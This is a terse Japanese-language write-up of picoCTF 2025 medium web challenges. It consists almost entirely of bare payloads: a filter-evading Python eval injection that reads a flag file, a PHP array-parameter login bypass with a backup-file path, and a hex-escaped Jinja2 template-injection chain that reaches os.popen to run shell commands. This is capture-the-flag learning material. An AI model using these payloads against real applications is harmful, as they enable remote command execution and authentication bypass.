picoCTF 2025 writeup (Web)

picoCTF 2025 の Web 問題の Writeup.
難易度 medium のみ掲載

Pachinko

3v@l

__import__('builtins').open(chr(47) + 'flag' + chr(46) + 'txt').read()
        

WebSockFish

Apriti sesamo

/impossibleLogin.php~
        
username[]=aaa&pwd[]=bbb
        

SSTI2

{{config|attr("\x5f\x5fclass\x5f\x5f")|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")('os')|attr("popen")('ls')|attr("read")()}}
        
{{config|attr("\x5f\x5fclass\x5f\x5f")|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")('os')|attr("popen")('cat flag')|attr("read")()}}